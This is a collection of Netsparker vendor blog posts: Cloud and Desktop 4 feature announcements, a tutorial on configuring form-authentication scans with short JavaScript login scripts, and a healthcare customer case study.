There is no limit to how many users you can create for each account and the main account holder can configure different privileges for each created user, ensuring that every user only has access to what they need to do the job. Refer to Ease Collaboration and Improve Productivity with Netsparker Cloud for more information on the multi-user feature.

Vulnerability Management To Ease Fixes

Netsparker Cloud has a built in vulnerability management system which allows team members to assign vulnerabilities as tasks to others, thus ensuring everyone knows what needs to be done. Similar to a bug tracking system, this feature really helps in ensuring all vulnerabilities are remedied.

Team members can assign vulnerabilities as tasks to developers so they can be fixed

Once a vulnerability is marked as fixed, Netsparker Cloud will automatically scan the web application to verify the fix. Should it not be fixed, the task will be automatically reassigned to the developer. Read Vulnerability Management and Remediation for more information on this handy feature. And if you would rather continue using your existing bug tracking system, that is fine as well, as Netsparker Cloud can be easily integrated with it.

Fully Configurable Web Security Scanning Service

Even though Netsparker Cloud is an online service it is a fully configurable online web security scanning service. In terms of configuration it is the same as Netsparker Desktop, there are no limitations to the type of scan settings you can configure, or which scan policy or URL rewrite rules to use for a web vulnerability scan.

Easily Manage the Security of Many Websites

In Netsparker Cloud you can create groups and use them to group websites. By grouping websites you can configure specific scan policies and settings that are used to scan the websites in the group, or scan a whole group of websites at the same time. Groups also allow you to easily get an overview of the security state of all the websites in the group, rather than having to manually sift through thousands of scan results.

Integrate Web Security Scanning in Your SDLC

Integrating Netsparker Cloud into your SDLC and Continuous Development process is very easy and secure: an API token is issued for each user, and all types of actions, such as launching a new web application security scan and getting the results of a scan, can be triggered via the API. Detailed API documentation is available in Netsparker Cloud.

Apply for a Netsparker Cloud Trial

The above list is just an overview of what is new in Netsparker Cloud. See for yourself how much time and resources your business can save when using Netsparker Cloud to ensure the security of all websites and web applications. Apply for a Netsparker Cloud trial and your region’s product specialist will get in touch and sort out a free full trial.

We Would Like to Hear From You

As much as we are happy with this new release of Netsparker Cloud, we are also excited about what lies ahead. Even though we are confident that Netsparker Cloud has already raised the bar for online web application security scanners, we are sure there is still a lot to be done, therefore we would like to hear from you. Go ahead and apply for a Netsparker Cloud trial and let us know what you think of it. Visit the Netsparker Cloud product page and the Netsparker Cloud benefits page for more information about the features of Netsparker Cloud and the benefits your business can take advantage of when securing web applications with Netsparker Cloud.

Netsparker 4 - Easier to Use, More Automation and Many More Web Security Checks


We are happy to announce a new major version update of the desktop edition of our scanner: Netsparker Web Application Security Scanner version 4. The main highlight of this new version is the new fully automated Form Authentication mechanism; it does not require you to record anything, and supports two-factor authentication and other authentication mechanisms that require a one time code out of the box.

Below is a list of the feature highlights of the new Netsparker Web Application Security Scanner version 4.

Configuring New Web Application Security Scans Just Got Easier

This is the first thing you will notice when you launch the new version of Netsparker Desktop; a more straightforward and easier to use New Scan dialog. Easy to use software has become synonymous with Netsparker’s scanners and in this version we raised the bar again, giving the opportunity to many users to launch web security scans even if they are not that familiar with web application security.

The Start a New Scan dialog in Netsparker Desktop has been simplified

As seen in the above screenshot all the generic scan settings you need are ergonomically placed in the right position, allowing you to quickly configure a new web application security scan. All of the advanced scan settings, such as HTTP connection options have been moved to scan policies.

Revamped Form Authentication Support to Scan Password Protected Areas

The new fully automated form authentication mechanism of Netsparker Desktop emulates a real user login, therefore even if tokens or other one-time parameters are used by the web application, an out of the box installation of the scanner can still log in to the password protected area and scan it. In the below example Netsparker is being used to log in to the MailChimp website.

Configuring form authentication in Netsparker is very simple. Just specify a URL and the credentials

Once you enter the necessary details, mainly the login form URL and credentials you can click Verify Login & Logout to verify that the scanner can automatically login and identify a logged in session, as shown in the below screenshot.

Use the Verify Login and Logout button to verify that the scanner can login automatically and identify a logged in session

You do not have to record any login macros because the new mechanism is all based on DOM. You just have to enter the login form URL, username and password and it will automatically login to the password protected section. We have tested the new automated form authentication mechanism on more than 300 live websites and can confirm that while using an out of the box setup, it works on 85% of the websites. 13% of the remaining edge cases can be fixed by writing 2-5 lines of JavaScript code with Netsparker’s new JavaScript custom script support. Pretty neat, don’t you think? The below are just a few of the login forms we tested.

A few of the login forms we tested with the new automated form authentication mechanism

The new Form Authentication mechanism also supports custom scripts which can be used to override the scanner’s behaviour, or in rare cases where the automated login button detection is not working. The custom scripting language has been changed to JavaScript because it is easier and many more users are familiar with it.

Out of the Box Support for Two-Factor Authentication and One Time Passwords

The new Form Authentication mechanism of Netsparker Desktop can also be used to automatically scan websites which use two-factor authentication or any other type of one-time password technology. It is very simple to configure: specify the login form URL, username and password and tick the option Interactive Login, so that a browser window is automatically opened allowing you to enter the third authentication factor during a web application security scan.

Interactive Form Authentication allows users to scan web applications using two-factor authentication or one time passwords and tokens

Ability to Emulate Different User Roles During a Scan

To ensure that all possible vulnerabilities in a password protected area are identified, you should scan it using different users that have different roles and privileges. With the new form authentication mechanism of Netsparker you can do just that! When configuring the authentication details specify multiple usernames and passwords so in between scans you just have to select which credentials should be used without the need to record any new login macros or reconfiguring the scanner.

In the form authentication configuration you can specify multiple users which have different roles

Automatically Identify Vulnerabilities in Google Web Toolkit Applications

Google Web Toolkit, also known as GWT is an open source framework that gained a lot of popularity. Nowadays many web applications are being built on it, or using features and functions from it. Since the web applications that are built with GWT heavily depend on complex JavaScript, we built a dedicated engine in Netsparker to support GWT.

This means that you can use Netsparker Desktop to automatically crawl, scan and identify vulnerabilities and security flaws in Google Web Toolkit applications.

Netsparker identified an SQL injection vulnerability in a Google Web Toolkit application

Identify Vulnerabilities in File Upload Forms

Like with every version or build of Netsparker we release, we included a number of new security checks in this version. Though one specific web application security check that is included in this version deserves more attention than the others: file upload form vulnerabilities.

From this version onwards Netsparker Desktop will check all the file upload forms on your websites for the vulnerabilities such forms are typically susceptible to. For example, Netsparker tests that all the validation checks in a file upload form work and that they cannot be bypassed by malicious attackers.

An unrestricted file upload form reported in Netsparker

Mixed Content Type, Cross-Frame Options, CORS configuration

We also added various new web security checks mostly around HTML5 security headers. For example Netsparker now checks for X-Frame-Options usage, and possible problems in the implementation of it which can lead to Clickjacking vulnerabilities and some other security issues.

Another new check examines the configuration of CORS headers. Finally in this category we added Mixed Content Type checks for HTTPS pages and Content Type header analysis for all of the pages.

XML External Entity (XXE) Engine

Applications that deal with XML data are particularly susceptible to XML External Entity (XXE) attacks. Successful exploitation of an XXE vulnerability allows an attacker to launch other, more grievous attacks, such as code execution. From this version onwards, Netsparker automatically checks websites and web applications for XXE vulnerabilities.

Insecure JSONP Endpoints - Rosetta Flash & Reflected File Download Attacks

In this version we added a new security check to identify insecure JSONP endpoints and other controllable endpoints that can lead to Rosetta Flash or Reflected File Download attacks.

Even if your application is not using JSONP you can still be vulnerable to this type of attack in other forms, hence why it is always important to scan your website with Netsparker.

Other Netsparker Desktop 4 Features and Product Improvements

The above list just highlights the most prominent features and new security checks of Netsparker Desktop version 4, the only false positive free web application security scanner. Included in this version there are also more new security checks and we also improved several existing security checks, hence the scanner’s coverage is better than ever before. Of course we also included a number of product improvements.

Since there have been a good number of improvements and changes in this version, there are also some things from older versions of Netsparker which are no longer supported, such as scan profiles. Because we changed the way Netsparker saves scan profiles, scan profiles generated with older versions of Netsparker will no longer work. Therefore we recommend that you check the Netsparker Desktop version 4 changelog for more information on what is new, changed and improved.

Upgrading Netsparker Web Application Security Scanner

If you are already using Netsparker Web Application Security Scanner, a pop up window with the upgrade details will pop up the next time you run Netsparker. Alternatively you can click Check for Updates from the Help drop down menu to force manual updates.

If you have problems with the upgrade or product related queries, get in touch with our awesome support team by sending us an email on support@netsparker.com.

How to Scan Websites with Form Authentication with Netsparker Desktop


Netsparker New Automated Form Authentication Support

In Netsparker Desktop we introduced a new form authentication mechanism that makes it easier to configure scans for websites which require user authentication. The goal was to provide the user with an easy to use and less error-prone system for configuring form authentication in Netsparker.

How Netsparker Form Authentication Was Working Previously

Prior to version 4, Netsparker had an HTTP-macro based form authentication mechanism where you had to interactively record the sequence of your website’s form authentication. Netsparker replayed this macro sequence to log in to your website during the scan. Since this method replays the HTTP requests exactly in the order they were recorded, with the exact parameter values, it failed on websites which use token-like parameters because the recorded token values were reused.

Netsparker had a powerful scripting capability which you could use to manipulate each request before it is issued, but writing custom scripts required knowledge of a .NET programming language (C# or VB.NET) and also knowledge of the Netsparker Authentication API. Dealing with the nitty-gritty details of HTTP requests, especially for cases where there are dozens of them, was also not an ideal solution.

Form Authentication Support in Netsparker

The new form authentication mechanism introduced in Netsparker Desktop 4 approaches this problem from a completely different angle. Netsparker 4 fills and submits the login forms on your websites by means of the DOM of the login form page, i.e. without the need to record any login macros. It automatically detects the login form components, the username & password inputs, populates them and submits the login form. To do this, you only need to configure the following (as shown in the below screenshot):

  • Login form URL

  • Credentials (username & password)

To configure form authentication in Netsparker simply specify the login form URL and credentials

How to Select a Login Form URL

The login form URL that should be configured in Netsparker is the URL of the page where your login form resides. Most websites these days have URLs like http://www.example.com/Login/ for their users to authenticate. It is also common for websites to have their login form on their homepage, usually located in the header or sidebar. If this is the case, specify your website’s home page URL in Netsparker as the login form URL. Netsparker has a better chance of detecting and filling the login form on pages dedicated to the login operation, so always specify the dedicated login form URL if you have a login form both on your homepage and on a dedicated login page.

Configuring Credentials and Multiple Persona Support

The other piece of information Netsparker requires for authenticating during a web application security scan is the credentials. As seen in the below screenshot you can enter more than a single set of credentials to simulate the different kinds of personas your website supports, e.g. one for regular users and one for admin users. This way, you will be able to easily switch between accounts and perform authenticated scans with different user accounts which have different privileges.

Configure multiple sets of credentials to easily run authenticated scans using different users with different privileges

Verifying the Form Authentication Configuration by Simulating the Login and Detecting the Logout Pattern

Configuring form authentication is that simple! Once ready, just click the Verify Login & Logout button and Netsparker will use the provided information to authenticate to your website. During the verification process, which is required to perform authenticated scans, you will confirm that Netsparker is able to:

  1. Authenticate with the provided configuration

  2. Detect the difference between a logged in and logged out session

You can verify the form authentication configuration either while configuring it or before starting a scan; Netsparker will prompt you to perform the verification process if it has not already been performed prior to starting the scan. Verifying the logout detection pattern is crucial because Netsparker will try to detect this pattern during the scan and, when this pattern is matched, it will try to re-authenticate automatically to the website before proceeding with any other crawling or attacking requests, ensuring the password protected section is completely scanned. There are 2 types of logout detection patterns that Netsparker identifies:

  1. Redirect-based

  2. Keyword-based

Logout Detection

Redirect-based logout detection

Many websites redirect the user back to the login form page when a restricted page is requested anonymously, without any valid session. If your website does so, Netsparker will detect a Redirect-based logout. To do this, Netsparker makes an anonymous request to a login required URL and identifies a Redirect-based logout if an HTTP 30x redirect response is detected. Netsparker simply uses the last URL that the form authentication simulation requested as the login required URL. For example, the form authentication simulation may end up on a URL like http://mysite.com/Dashboard/, which is a very good candidate for a login required URL.

Keyword-based logout detection

Some other websites do not issue a redirect when an anonymous request to a login required URL is performed, or the identified login required URL displays a page that is very similar to the authenticated page. In such cases Netsparker will detect and use a Keyword-based logout. This type of logout detection identifies a logged out session by searching for specified keywords in the HTTP responses. If all of the specified keywords are found in a response, Netsparker determines that the session is currently logged out, or has been invalidated.

Interactive login

Support for CAPTCHA, One Time Tokens and Two Factor Authentication Mechanisms

Many modern websites and web applications use CAPTCHA, two-factor authentication and other similar mechanisms for user authentication. Such mechanisms require you to enter a one-time PIN, code or other data during the authentication process, which typically is not available at the time of configuration. Netsparker supports these mechanisms through the “Interactive login” feature. When you tick the Interactive Login check box in the form authentication configuration, Netsparker will automatically pop up an interactive browser window during the authentication so you can perform any operations necessary to complete the authentication, be it entering a CAPTCHA or a PIN sent via SMS.

The interactive login feature allows you to specify a one time password, token or captcha phrase during an automated web application security scan.

Below are some scenarios where you can use the Interactive login feature:

  • The website requires a CAPTCHA (to be solved during authentication or to access a particular area)

  • The website requires you to enter a dynamic token value like a 2FA PIN during authentication

  • You are not able to configure Netsparker to fill the login form and want to manually perform authentication (i.e. the login form is rendered as a Flash/Silverlight/Java Applet embed in browser)

You can also mix and match the Interactive login functionality with the automatic login capability and custom scripting support. For example, imagine a website requiring you to enter a regular username and password on the first page and a 2FA PIN on the second page. In that case you can configure the credentials and enable the Interactive login option, so Netsparker will first submit the regular login form details and then prompt you with the interactive login browser allowing you to enter the 2FA PIN.

Combining the Use of Multiple Website Authentication Mechanisms

Configure multiple authentication mechanisms at once so they are used together during a scan

If your form authentication pages also require other types of authentication such as basic or client certificate, you can simply configure the settings together with the form authentication settings in the Start a New Scan dialog. When you configure them, Netsparker will automatically use all the configured information when accessing the form authentication pages during a web application security scan.

Custom Scripts for Form Authentication in Netsparker

There will be cases where you need to tweak Netsparker's automatic authentication, or where it will not work for your website. Do not fret; with the help of custom scripting support, you can automate the form authentication process of your websites easily. Here are some of the cases where you may need custom scripting:

  • The login form is not a regular login form with 2 input fields, for example you need to select a department from a select box or a drop down menu

  • The submit button on login form is not a regular HTML button

  • There are multiple forms in the login form page and Netsparker is unable to detect the correct form. For example Netsparker locates the signup form which is on the same page

  • The login form is not present in the DOM when the page loads; you need to click a link to make the login form appear on the page, usually in a virtual login dialog

  • The authentication process consists of several page navigations; you need to first visit a page to get a cookie and then visit another to enter the username and then yet another to enter the password

  • Netsparker is unable to locate the login form for various other reasons.

Custom scripts for form authentication in Netsparker can be written with the JavaScript language, which many professionals are familiar with. Netsparker executes the JavaScript code in the context of form authentication pages, where you can access and manipulate the page DOM. The code will be executed by the time the page is fully loaded. You can use any HTML API that modern browsers support to locate the login form elements and fill them.

The Custom Script editor provides you with a convenient environment to author your custom scripts. It mainly consists of 3 parts: A script editor, an embedded browser view and a developer tools pane.

Use the custom script editor to write scripts for form based authentication

You can write your scripts in the script editor on the left. Any HTML/JavaScript/DOM API that is supported in a modern browser is supported here too. Additionally, you can use the helper functions provided by Netsparker in the ns.auth namespace. These functions will help you fill input values, click elements, etc. You can read more about how to call these functions in the Form Authentication API documentation.

The browser view on the right helps you preview the login form page and generate code for elements on authentication pages. This window initially loads the login form URL when opened. You can right click elements on the page to get a context menu with code generation options. You can generate code that either works immediately or works after a delay by using the “Generate element code” and “Generate element code (delay 2000ms)” menu items respectively.

When you click these menu items, a single line of code will be appended to the script editor on the left. If you generate code for an input element, JavaScript code that sets its value will be generated. If you generate code for an element like a button or an anchor, JavaScript code that clicks that element will be generated.

You can also customize the code that is automatically generated. For example, you can replace the variable username generated for a setValueByQuery call with a hardcoded JavaScript string like 'john.doe' (use of the dynamic variables username and password is encouraged though, if you mean to supply credential values). As mentioned above, the 2 variables username and password are available to your scripts. These variables contain the credentials of the active persona at the time of execution, and by using them your script will be generic enough to support the multiple persona feature.

Automatically generate code for elements on the authentication page


The custom script editor also has a developer tools pane right below the browser view, in the lower right corner of the editor. This pane has all sorts of web development helper tabs that a seasoned web professional will be familiar with. All these tabs work in the context of the page currently loaded in the browser view, and you can:

  • Inspect the current states of the HTML elements on Elements tab,

  • Monitor the HTTP requests on Network tab,

  • See logs and execute script code on Console tab,

  • etc.

There are several toolbar buttons on this window:

Load Login Form (F4): By pressing this button, a new browser view instance will be created and the specified login form URL will be loaded into it. No custom script code is executed when you press this button, and any cookies from the previous browser view are discarded.

Test Script (F5): You can start executing the custom script code you have written by pressing this button. Your login form URL will be loaded into a new browser view and the script execution will start once the login form has finished loading. If you have written several pages of custom script, all of them will be executed in the order they are written. You can see the status of the current page and the status of script execution right next to the address bar above the browser view.

Clear: This button clears all the code on the current script page of the editor.

Templates: Some sample script templates are listed under this drop down button. Selecting one of these will load the predefined script. You can start with these sample codes and tweak this script to suit your needs.

The Generate optimized code check box below the browser view is checked by default. When enabled, the Generate element code menu items will try to generate the shortest, most optimized CSS query possible. For example, if you have an HTML element with an id value, a very concise CSS query selector using that value will be generated, since id values uniquely identify an element in an HTML document. In some cases your elements may have randomly generated id values that differ each time the page is loaded; in these cases you may want to uncheck this option to generate an alternative CSS query that does not use the id value.

Executing scripts on multiple pages

Custom scripting supports scripting against multiple pages if your form authentication consists of multiple pages or has redirects. For most of these scenarios a single page of custom script will help you authenticate with the website. The following screen capture demonstrates a form authentication case where the username (email address in this case) needs to be entered on the first page and password needs to be entered on the next page navigated:

Writing a custom script for an authentication process which takes place over several pages

Since there is a brand new document context after each page load, you are required to enter the custom script code for each page on a separate script page dedicated to it. Netsparker will give you a chance to execute your custom script code after each page navigation during the form authentication process, therefore all you need to do is create the script pages in this window and write the corresponding piece of code for each page.

Form Authentication Troubleshooting, Tips & Tricks

Q: My login form is dynamically rendered inside an inline dialog and Netsparker cannot find it, how can I fill that login form?

A: Write a custom script that first clicks the link or button that triggers the dialog and then populates the login form after a delay:

ns.auth.clickByQuery('#header > div.row > a:nth-child(1)'); // Trigger the login dialog
ns.auth.setValueByQuery('#email', username, 2000);
ns.auth.setValueByQuery('#password', password, 2000);
ns.auth.clickByQuery('#login-button', 3000);

The code above will first trigger the login dialog (first line), fill in the username & password after 2 seconds and click the login button in the dialog after 3 seconds.

Q: My login form has some other fields along with username and password, how can I fill that login form?

A: Write a custom script that fills the username and password from the current persona variables and hardcodes the rest of the credentials in the script:

ns.auth.setValueByQuery('#Username', username);
ns.auth.setValueByQuery('#Password', password);
ns.auth.setValueByQuery('#LoginCode', '4815162342'); // Hard-coded extra credential
ns.auth.clickByQuery('#LoginButton');

Q: How can I provide custom cookies that are required during form authentication?

A: Specify the cookies in the Custom Cookies section of the General section of your current scan profile. These cookies will be issued during the form authentication requests.

Q: How can I provide custom header values or change the user agent string during form authentication?

A: You can create a scan policy with custom header values and/or modified user agent strings and select it on the current profile during form authentication.

Q: My site requires me to visit some pages before displaying the login form URL and I cannot use the login form URL directly, how should I authenticate?

A: Use the first page that is required to be visited as the Login form URL. Then, using custom scripting, write code that performs navigation for each page that needs to be visited. You can click the HTML elements via scripting or simply use code like the following to just perform the navigation:

document.location = 'https://mysite.com/login/next_page.htm';

Q: My site performs several redirects before reaching the login form, how can I write custom script code for the login form?

A: Create custom script pages for each redirect leaving the script editor empty, and write your custom script for login form on the last page. Netsparker won’t run any code for pages that perform the redirect.

Q: I need to run some script code after a certain amount of time, how can I do that?

A: Use the built-in setTimeout JavaScript function:

setTimeout(function() {
   // Write your JavaScript code here to execute after 2000 milliseconds
}, 2000);

TIP: Use the functions provided by the Netsparker Form Authentication API (ns.auth) to set input values or click elements. These functions do not simply set values or click elements, but also simulate any JavaScript events that are triggered when a user performs these tasks. Some JavaScript frameworks require these events to be fired, so simply setting input values or clicking elements may not be enough.
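To see why the tip above matters, here is an added example (not part of the original post and not Netsparker's own ns.auth implementation) of the difference between assigning an input's value directly and assigning it while dispatching the events a real keystroke produces. It assumes a Node.js runtime with the global EventTarget and Event classes, and it models the input element and a framework-style two-way binding with constructed stand-ins, so it runs without a browser.

```javascript
// Added example: not Netsparker's ns.auth code. A constructed input stand-in
// built on Node's global EventTarget so the example runs without a browser DOM.
class FakeInput extends EventTarget {
  constructor(id) {
    super();
    this.id = id;
    this.value = '';
  }
}

// A minimal "framework" binding, constructed for the example: like real two-way
// binding libraries, it only copies the field value into its model when an
// 'input' event fires on the element.
function bindModel(input, model, key) {
  input.addEventListener('input', () => {
    model[key] = input.value;
  });
}

// Naive approach: assign the value property directly. The property changes,
// but no event fires, so the framework model never learns about it.
function setValueNaive(input, value) {
  input.value = value;
}

// Event-aware approach (what a helper such as ns.auth.setValueByQuery is
// described as doing): set the value, then dispatch the events a user typing
// into the field would trigger, 'input' followed by 'change'.
function setValueWithEvents(input, value) {
  input.value = value;
  const fired = [];
  for (const type of ['input', 'change']) {
    input.dispatchEvent(new Event(type, { bubbles: true }));
    fired.push(type);
  }
  return fired; // the event types that were dispatched, in order
}

// Run both approaches against a constructed login field bound to a model and
// return snapshots of what the model saw after each approach.
function demo() {
  const model = {};
  const usernameField = new FakeInput('Username');
  bindModel(usernameField, model, 'username');

  setValueNaive(usernameField, 'john.doe');
  const afterNaive = { ...model };          // binding never fired: {}

  const fired = setValueWithEvents(usernameField, 'john.doe');
  const afterEvents = { ...model };         // binding ran: { username: 'john.doe' }

  return { afterNaive, afterEvents, fired };
}

console.log(demo());
```

The naive assignment leaves the field's value set but the model empty, which is exactly the situation where a login form appears filled in yet the application submits blank credentials; dispatching the events is what makes frameworks that listen for them pick the value up.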

TIP: You do not necessarily need to click the Login button on your page. If you have a JavaScript function that performs the login, you can call that function after populating the login form:

ns.auth.setValueByQuery('#Username', username);
ns.auth.setValueByQuery('#Password', password);
MyApp.LoginController.DoLogin();

Known issues

  • Netsparker does not have scripting support for popups opened during the form authentication process. Please use the URL loaded into the popup window as your Login form URL if that is possible.

  • Generate element code menu items do not generate the correct CSS query for elements that are inside frames. You need to locate the elements manually by code.


Healthcare at Home Ltd Drastically Reduces Costs and Improves the Development of New Web Application Features with Netsparker


“Netsparker has allowed us to proactively security test our healthcare patient centric web applications to the highest level and safeguard confidentiality along with huge cost savings and ease of use.” - Dale Langham, Senior Data Platforms Manager, Healthcare at Home Ltd.

Healthcare at Home Logo

Healthcare at Home Ltd was established in 1992 and the vision was, and still remains today, to enhance the way in which care is provided for patients both in the home and in the community. The company has grown rapidly since its beginnings to become the UK’s leading provider of innovative home health care services.

Unaffordable Third Party Web Application Security Services

The Healthcare at Home Ltd technical department has to maintain more than fifty websites and user portals, all of which are used 24/7 by staff and remote business partners alike to access patient, nurse and medicine records. To ensure the security of all the confidential data such websites hold, and to comply with strict regulatory compliance rules, Healthcare at Home hired third party security professionals. However, as the company grew and their web applications became more complex, it became obvious that fully depending on third party services was not sustainable because:

  • The process of keeping the websites and confidential data secure was becoming more complex, hence the prices skyrocketed and became unaffordable.
  • The development of new features in web applications was being slowed down because third party consultants were not always available, thus negatively impacting business operations.

Adding In-House Web Application Security Tests to the Equation

To ensure the continuous development and implementation of new web application features and the security of all confidential data at an affordable price, Healthcare at Home Ltd opted to move the majority of web application security tests in-house, thus reducing the dependency and costs of third party security service. “The main reason was to be able to pen test our web applications internally within the business prior to our regulatory external company pen testing. By doing so we can keep costs at a minimum and can release new web application features without waiting for when the contractor is available,” explained Dale Langham, the Senior Data Platforms Manager for Healthcare at Home Ltd.

To start doing their own web application security testing, Healthcare at Home Ltd needed a software solution that could:

  • Automatically identify vulnerabilities and security flaws in their custom built web applications.
  • Be easy to use and report no false positives, to compensate for the shortage of manpower and internal web security expertise.
  • Scan both PHP and .NET web applications running on both Apache and Microsoft IIS web servers.
  • Perform fast web application security scans to keep up with the constant changes in more than fifty web applications.
  • Be backed by professional support to iron out any problems the team might encounter when scanning web applications.

Saving on Costs and Boosting Both Security and Productivity with Netsparker

After evaluating several automated web application security solutions Healthcare at Home Ltd chose Netsparker Desktop on the basis that it is very easy to use and reports no false positives. “I got sold on the fact that Netsparker does not report any false positives. Considering the limited amount of time we have to release new features I cannot afford to waste time verifying the scanner’s results and can go straight to the developers to report the problems,” stated Mr Langham.

“We have been using Netsparker for over 9 months now and it helped us drastically reduce our external pen testing costs and ensures we fully test our web applications prior to and during LIVE release. We are now able to internally test our web based applications after any changes we make without having to rely on external third party assistance,” continued Mr Langham.

Identifying Critical Web Application Vulnerabilities

Healthcare at Home Ltd confirmed that Netsparker already uncovered some vulnerabilities that if exploited would have allowed an attacker to gain access to confidential data. But now they are no longer worried about it. As Dale Langham explains “Netsparker has allowed us to proactively security test our healthcare patient centric web applications to the highest level and safeguard confidentiality along with huge cost savings and ease of use.”

About Healthcare at Home Ltd

Healthcare at Home Ltd was established in 1992 by founder and former chairman Charles Walsh. The vision was, and still remains today, to enhance the way in which care is provided for patients both in the home and in the community.

The company has grown rapidly since its beginnings to become the UK’s leading provider of innovative home healthcare services. We now deliver every day of the year (aside from Christmas Day, Boxing Day and New Year’s Day) supported by a bespoke IT infrastructure.

We work with the NHS, pharmaceutical companies, private medical insurers, consultants, GPs, Patient Groups and charities. Our team of over 1,000 staff operate from locations throughout the UK to provide national services delivered from a local base.

About Netsparker Ltd

Netsparker Ltd is a young and enthusiastic UK based company focused on developing automated web security products, mainly the false positive free web application security scanners Netsparker Desktop and Netsparker Cloud. Netsparker management and engineers have more than two decades of experience in the web application security industry, which is reflected in their products. Founded in 2009, Netsparker’s automated web vulnerability scanners are leading security tools used by world renowned companies such as Samsung, NASA, Microsoft, ING bank, Skype and Ernst & Young.
